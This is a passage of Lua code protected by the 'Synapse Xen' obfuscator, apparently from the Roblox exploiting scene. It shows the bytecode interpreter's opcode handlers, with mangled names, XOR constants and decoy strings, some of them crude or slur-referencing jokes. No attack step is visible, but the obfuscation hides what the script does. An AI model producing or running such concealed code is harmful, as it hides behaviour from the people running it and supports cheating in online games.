SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3322556782,972441856)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1377560976]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(850334287,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(4149485349,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1314125546,4261567925,1917812994,3749812551,3302043318,1941016047}return SynapseXen_ilIliiI[1377560976]end)("llIlII","iIIIlliillilliII","lililIiilIlIIlIIli",{},{},{}),512)]if not not SynapseXen_IiIiilIIliIIlliI==(SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[580469593]or(function()local SynapseXen_IiIil="this is a christian obfuscator, no cursing allowed in our scripts"SynapseXen_ilIliiI[580469593]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1506415888,1060588969),SynapseXen_IiilillliiIi(2043838167,SynapseXen_IllIiIili[4]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{2526062234,3181160601,2753595644,2480031894,1978791148}return SynapseXen_ilIliiI[580469593]end)(),512)==0)then SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+1 else SynapseXen_lIiil[SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[1366149339]or(function(...)local SynapseXen_IiIil="pain exist is gonna connect the dots of xen"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1225187306,645071338)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3349845260,945130957)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1366149339]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3012510797,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1478767772,SynapseXen_IllIiIili[5]))-string.len(SynapseXen_IiIil)-#{83473932,3240723155,1285023165,768171859,1955343291,1303198660,258060400,2380430487}return SynapseXen_ilIliiI[1366149339]end)({}),256)]=SynapseXen_IiIiilIIliIIlliI end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[2022536208]or(function()local SynapseXen_IiIil="pain is gonna use the backspace method on xen"SynapseXen_ilIliiI[2022536208]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2204642744,2883945894),SynapseXen_IiilillliiIi(1714305068,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{246647391,1250969113,2303190660,1541265052,2771357999,2779203575,413246729,3738841148,1916020268}return SynapseXen_ilIliiI[2022536208]end)())then local SynapseXen_llIlIliI=SynapseXen_lIiil;local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IlIIlIIilIililIlll(SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[3617082154]or(function()local SynapseXen_IiIil="xen detects custom getfenv"SynapseXen_ilIliiI[3617082154]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(897181679,3612880290),SynapseXen_IiilillliiIi(4245614124,SynapseXen_IllIiIili[4]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{1992049109,2049062640,3703793405}return SynapseXen_ilIliiI[3617082154]end)(),512),SynapseXen_iIIlIiiIiiiIIIi,512)local SynapseXen_IiiliiiIiIII=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]for SynapseXen_IiliiliIiiIiiIliIlI=SynapseXen_IiIiilIIliIIlliI+1,SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[2951776050]or(function()local SynapseXen_IiIil="https://twitter.com/Ripull_RBLX/status/1059334518581145603"SynapseXen_ilIliiI[2951776050]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2071583718,1090763901),SynapseXen_IiilillliiIi(4203395677,SynapseXen_IllIiIili[6]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{2810884872,2235130144,2799733900,1687364483,2094862939}return SynapseXen_ilIliiI[2951776050]end)(),512)do SynapseXen_IiiliiiIiIII=SynapseXen_IiiliiiIiIII..SynapseXen_llIlIliI[SynapseXen_IiliiliIiiIiiIliIlI]end;SynapseXen_lIiil[SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[2300583689]or(function()local SynapseXen_IiIil="my way to go against expwoiting is to have safety measuwes. i 1 wocawscwipt and onwy moduwes. hewe's how it wowks: this scwipt bewow stowes the moduwes in a tabwe fow each moduwe we send the wist with the moduwes and moduwe infowmation and use inyit a function in my moduwe that wiww stowe the info and aftew it has send to aww the moduwes it wiww dewete them. so whenyevew the cwient twies to hack they cant get the moduwes. onwy this peace of wocawscwipt."SynapseXen_ilIliiI[2300583689]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1947696264,3613551627),SynapseXen_IiilillliiIi(3990547440,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2539955412,3667783092,3044910418,2229024049,1164134358,3058349591}return SynapseXen_ilIliiI[2300583689]end)(),256)]=SynapseXen_IiiliiiIiIII elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[1341726496]or(function()local SynapseXen_IiIil="hi xen doesn't work on sk8r please help"SynapseXen_ilIliiI[1341726496]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3982887748,3642039223),SynapseXen_IiilillliiIi(2061355182,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{863253678,666823729,1623759694,1346073391,1952132708,2561477551,2332675112,3403960588,296617473,141316335}return SynapseXen_ilIliiI[1341726496]end)())then SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+SynapseXen_illIIilIiIIiIIill[990094981]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[3824241399]or(function(...)local SynapseXen_IiIil="now comes with a free n word pass"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(4285787574,2790263588)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3435370136,859603022)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3824241399]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1238312954,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1581757511,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2676759635,739619433,200905749,2438822970,3674163877,794336556,2185417487,3062733246,3766334588}return SynapseXen_ilIliiI[3824241399]end)(5160,"IllIliliiiIl","II",464))then SynapseXen_lIiil[SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[57854657]or(function()local SynapseXen_IiIil="sometimes it be like that"SynapseXen_ilIliiI[57854657]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1520421415,2539160393),SynapseXen_IiilillliiIi(2204836894,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{162187267,1543585124,3168062294,243810808,2457674415,2249878906,3460846744,2912432451}return SynapseXen_ilIliiI[57854657]end)(),256)]=SynapseXen_llIll[SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[2116109763],SynapseXen_ilIliiI[751506800]or(function()local SynapseXen_IiIil="wait for someone on devforum to say they are gonna deobfuscate this"SynapseXen_ilIliiI[751506800]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(816449309,2823617175),SynapseXen_IiilillliiIi(1477551726,SynapseXen_IllIiIili[6]))-string.len(SynapseXen_IiIil)-#{525631357,92689217}return SynapseXen_ilIliiI[751506800]end)(),262144)]]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[4022314603]or(function()local SynapseXen_IiIil="inb4 posted on exploit reports section"SynapseXen_ilIliiI[4022314603]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2972215391,1169715687),SynapseXen_IiilillliiIi(3124613698,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2858698720,3653472973,3214219833,9691451,1454717233,1039482449,2226076615,350990119,1301903082}return SynapseXen_ilIliiI[4022314603]end)())then local SynapseXen_liIilIlIllIill=SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[2736546422]or(function()local SynapseXen_IiIil="hi my 2.5mb script doesn't work with xen please help"SynapseXen_ilIliiI[2736546422]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3566577806,588045555),SynapseXen_IiilillliiIi(2618027719,SynapseXen_IllIiIili[2]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{2676965340,2971627755,302410272,195862392,3226151894,888206166,2242590360,1070180757}return SynapseXen_ilIliiI[2736546422]end)(),256)local SynapseXen_IiIiilIIliIIlliI=SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[1430549856]or(function()local SynapseXen_IiIil="SYNAPSE XEN [FE BYPASS] [BETTER THEN LURAPH] [AMAZING] OMG OMG OMG !!!!!!"SynapseXen_ilIliiI[1430549856]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(333553587,2837262521),SynapseXen_IiilillliiIi(1182069311,SynapseXen_IllIiIili[8]))-string.len(SynapseXen_IiIil)-#{1473332793,685762398,942984063,1615505711,3752817238,1856888132,2123082311}return SynapseXen_ilIliiI[1430549856]end)(),512)local SynapseXen_llIlIliI=SynapseXen_lIiil;local SynapseXen_illlIillllii,SynapseXen_lliiiiiIIiIliIIll;local SynapseXen_iIIIIlliilIIiIl;local SynapseXen_lIliiIilIiIliIIi=0;SynapseXen_illlIillllii={}if SynapseXen_IiIiilIIliIIlliI~=1 then if SynapseXen_IiIiilIIliIIlliI~=0 then SynapseXen_iIIIIlliilIIiIl=SynapseXen_liIilIlIllIill+SynapseXen_IiIiilIIliIIlliI-1 else SynapseXen_iIIIIlliilIIiIl=SynapseXen_llllIilliIllilII end;for SynapseXen_IiliiliIiiIiiIliIlI=SynapseXen_liIilIlIllIill+1,SynapseXen_iIIIIlliilIIiIl do SynapseXen_illlIillllii[#SynapseXen_illlIillllii+1]=SynapseXen_llIlIliI[SynapseXen_IiliiliIiiIiiIliIlI]end;SynapseXen_lliiiiiIIiIliIIll={SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill](unpack(SynapseXen_illlIillllii,1,SynapseXen_iIIIIlliilIIiIl-SynapseXen_liIilIlIllIill))}else SynapseXen_lliiiiiIIiIliIIll={SynapseXen_llIlIliI[SynapseXen_liIilIlIllIill]()}end;for SynapseXen_iIIIillIiilIII in next,SynapseXen_lliiiiiIIiIliIIll do if SynapseXen_iIIIillIiilIII>SynapseXen_lIliiIilIiIliIIi then SynapseXen_lIliiIilIiIliIIi=SynapseXen_iIIIillIiilIII end end;return SynapseXen_lliiiiiIIiIliIIll,SynapseXen_lIliiIilIiIliIIi elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[3342870101]or(function(...)local SynapseXen_IiIil="pain exist is gonna connect the dots of xen"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1098654455,3243870432)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(2324931777,1970056600)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3342870101]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(879888796,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2144473618,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-#{919989867,902504007,893782500,1740171295,236817768,828322005}return SynapseXen_ilIliiI[3342870101]end)(2306,1639,10015))then local SynapseXen_IiIiilIIliIIlliI=SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[901575753]or(function()local SynapseXen_IiIil="can we have an f in chat for ripull"SynapseXen_ilIliiI[901575753]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(1884837356,482614670),SynapseXen_IiilillliiIi(573574027,SynapseXen_IiIilliilIIl))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{325233660,430931876,473829056,508350055}return SynapseXen_ilIliiI[901575753]end)())local SynapseXen_llIlillliIl=SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[1664700482]or(function(...)local SynapseXen_IiIil="so if you'we nyot awawe of expwoiting by this point, you've pwobabwy been wiving undew a wock that the pionyeews used to wide fow miwes. wobwox is often seen as an expwoit-infested gwound by most fwom the suwface, awthough this isn't the case."local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(3257893979,2163280725)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(329713319,3965245807)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1664700482]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(834088162,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1036295520,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{3013420400,3490577637,277337370,2374358973}return SynapseXen_ilIliiI[1664700482]end)("Ililil",{},{}),512)local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_IiIiilIIliIIlliI>255 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiIiilIIliIIlliI-256]else SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]end;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;SynapseXen_llIlIliI[SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[1470730946]or(function(...)local SynapseXen_IiIil="now with shitty xor string obfuscation"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(110468070,1701971327)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(4001280741,293708894)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[1470730946]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3301197694,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3917524624,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{1066071833,1911478638,1149950825,1913962050,2467382136,2053466071,3470701894,4019475454,2472974025,4093939791}return SynapseXen_ilIliiI[1470730946]end)(9686,"ilillIlIIliIilii",{},{},8343,{},225,"iII"),256)]=SynapseXen_IiIiilIIliIIlliI*SynapseXen_llIlillliIl elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[647291093]or(function()local SynapseXen_IiIil="level 1 crook = luraph, level 100 boss = xen"SynapseXen_ilIliiI[647291093]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2817563015,1026498027),SynapseXen_IiilillliiIi(1512791828,SynapseXen_IllIiIili[6]))-string.len(SynapseXen_IiIil)-#{1838575768,2257542774}return SynapseXen_ilIliiI[647291093]end)())then SynapseXen_lIiil[SynapseXen_IiilillliiIi(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[576662871]or(function()local SynapseXen_IiIil="double-header fair! this rationalization has a overenthusiastically anticheat! you will get nonpermissible for exploiting!"SynapseXen_ilIliiI[576662871]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3976995595,1268439748),SynapseXen_IiilillliiIi(1511637436,SynapseXen_IllIiIili[8]))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{3291510289,2809583531,1367132121,1959605637,1424853659}return SynapseXen_ilIliiI[576662871]end)(),256),SynapseXen_iIIlIiiIiiiIIIi)]=#SynapseXen_lIiil[SynapseXen_IlIIlIIilIililIlll(SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[3371193562]or(function()local SynapseXen_IiIil="luraph better then xen bros :pensive:"SynapseXen_ilIliiI[3371193562]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2288930547,3662104352),SynapseXen_IiilillliiIi(478599674,SynapseXen_IiIilliilIIl))-SynapseXen_lliIiIliI-string.len(SynapseXen_IiIil)-#{3020565151,2770346504,2270703905,3633594914,2890819244,3377389278,2186404920,283981792,2782870530,3025609851}return SynapseXen_ilIliiI[3371193562]end)(),512),SynapseXen_iIIlIiiIiiiIIIi,512)]elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[4221415109]or(function(...)local SynapseXen_IiIil="aspect network better obfuscator"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(1067718852,1889820468)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3748988154,545977057)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[4221415109]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2731171624,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2741059596,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1596271682,1175515567,755984112,1479839235,279488799,964221340,1863654551}return SynapseXen_ilIliiI[4221415109]end)({},{}))then local SynapseXen_liIilIlIllIill=SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[3369655354]or(function(...)local SynapseXen_IiIil="sponsored by ironbrew, jk xen is better"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(286844601,3096835924)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1611551968,2683385912)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[3369655354]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(1187943456,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(2716665094,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-SynapseXen_lliIiIliI-#{2381423366,4230956279,1753928317,3951660238,1647034545,1731176534,1830351785}return SynapseXen_ilIliiI[3369655354]end)("llIIllIIl"),256)~=0;local SynapseXen_IiIiilIIliIIlliI=SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[4008609059]or(function(...)local SynapseXen_IiIil="i'm intercommunication about the most nonecclesiastical dll exploits for esp. they only characterization objects with a antepatriarchal in the geistesgeschichte for the esp."local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(4261984341,2239086953)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(3718156101,576816505)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII-SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[4008609059]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(3936275405,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(1516378656,SynapseXen_IllIiIili[3]))-string.len(SynapseXen_IiIil)-#{1676316590,2845277242,2194953648,3918601822,785182510}return SynapseXen_ilIliiI[4008609059]end)(13803,{}),512)local SynapseXen_llIlillliIl=SynapseXen_IlIIlIIilIililIlll(SynapseXen_illIIilIiIIiIIill[221391887],SynapseXen_ilIliiI[81649470]or(function(...)local SynapseXen_IiIil="https://twitter.com/Ripull_RBLX/status/1059334518581145603"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(704654177,818231341)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local SynapseXen_lilillii=type(SynapseXen_liiilIiliIlliiil)if SynapseXen_lilillii=="number"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil elseif SynapseXen_lilillii=="string"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_liiilIiliIlliiil:len()elseif SynapseXen_lilillii=="table"then SynapseXen_illiIiiIlliliIllllI=SynapseXen_IilllilIlIiIlillllI(1774818592,2520163017)end;SynapseXen_liliIililIillII=SynapseXen_liliIililIillII+SynapseXen_illiIiiIlliliIllllI end;SynapseXen_ilIliiI[81649470]=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(2356094829,SynapseXen_liliIililIillII),SynapseXen_IiilillliiIi(3690510443,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{1292403090,950125183,2541484540,3267197489}return SynapseXen_ilIliiI[81649470]end)("ilIIiIiIiiiIiiI",9420,9436,{}),512)local SynapseXen_llIlIliI=SynapseXen_lIiil;if SynapseXen_IiIiilIIliIIlliI>255 then SynapseXen_IiIiilIIliIIlliI=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_IiIiilIIliIIlliI-256]else SynapseXen_IiIiilIIliIIlliI=SynapseXen_llIlIliI[SynapseXen_IiIiilIIliIIlliI]end;if SynapseXen_llIlillliIl>255 then SynapseXen_llIlillliIl=SynapseXen_iIiIlIIiIiilIiIIiiIl[SynapseXen_llIlillliIl-256]else SynapseXen_llIlillliIl=SynapseXen_llIlIliI[SynapseXen_llIlillliIl]end;if SynapseXen_IiIiilIIliIIlliI<=SynapseXen_llIlillliIl~=SynapseXen_liIilIlIllIill then SynapseXen_lIIIllIiiIIlil=SynapseXen_lIIIllIiiIIlil+1 end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[2467764959]or(function()local SynapseXen_IiIil="double-header fair! this rationalization has a overenthusiastically anticheat! you will get nonpermissible for exploiting!"SynapseXen_ilIliiI[2467764959]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(3593758339,1327472104),SynapseXen_IiilillliiIi(3615522064,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{55543442,2719482109,104643524,1059462578}return SynapseXen_ilIliiI[2467764959]end)())then local SynapseXen_llIlIliI=SynapseXen_lIiil;for SynapseXen_IiliiliIiiIiiIliIlI=SynapseXen_IiilillliiIi(SynapseXen_IiilillliiIi(SynapseXen_illIIilIiIIiIIill[1152160448],SynapseXen_ilIliiI[3122272476]or(function()local SynapseXen_IiIil="print(bytecode)"SynapseXen_ilIliiI[3122272476]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2982119709,1504300805),SynapseXen_IiilillliiIi(2797150099,SynapseXen_IiIilliilIIl))-string.len(SynapseXen_IiIil)-#{2883263919,3058454807}return SynapseXen_ilIliiI[3122272476]end)()),SynapseXen_iIIlIiiIiiiIIIi),SynapseXen_IlIIlIIilIililIlll(SynapseXen_iiIii(SynapseXen_illIIilIiIIiIIill[1402414475],SynapseXen_ilIliiI[2597103828]or(function()local SynapseXen_IiIil="baby i just fell for uwu,,,,,, i wanna be with uwu!11!!"SynapseXen_ilIliiI[2597103828]=SynapseXen_IiilillliiIi(SynapseXen_IilllilIlIiIlillllI(2018439280,3939206900),SynapseXen_IiilillliiIi(2376768497,SynapseXen_IllIiIili[4]))-string.len(SynapseXen_IiIil)-#{346363697,721421327,2759737618}return SynapseXen_ilIliiI[2597103828]end)(),512),SynapseXen_iIIlIiiIiiiIIIi,512)do SynapseXen_llIlIliI[SynapseXen_IiliiliIiiIiiIliIlI]=nil end elseif SynapseXen_lliIiIliI==(SynapseXen_ilIliiI[3666688125]or(function(...)local SynapseXen_IiIil="wait for someone on devforum to say they are gonna deobfuscate this"local SynapseXen_liliIililIillII=SynapseXen_IilllilIlIiIlillllI(48399372,960146993)local SynapseXen_liIIilliilIllIIIiii={...}for SynapseXen_IlIiI,SynapseXen_liiilIiliIlliiil in pairs(SynapseXen_liIIilliilIllIIIiii)do local SynapseXen_illiIiiIlliliIllllI;local 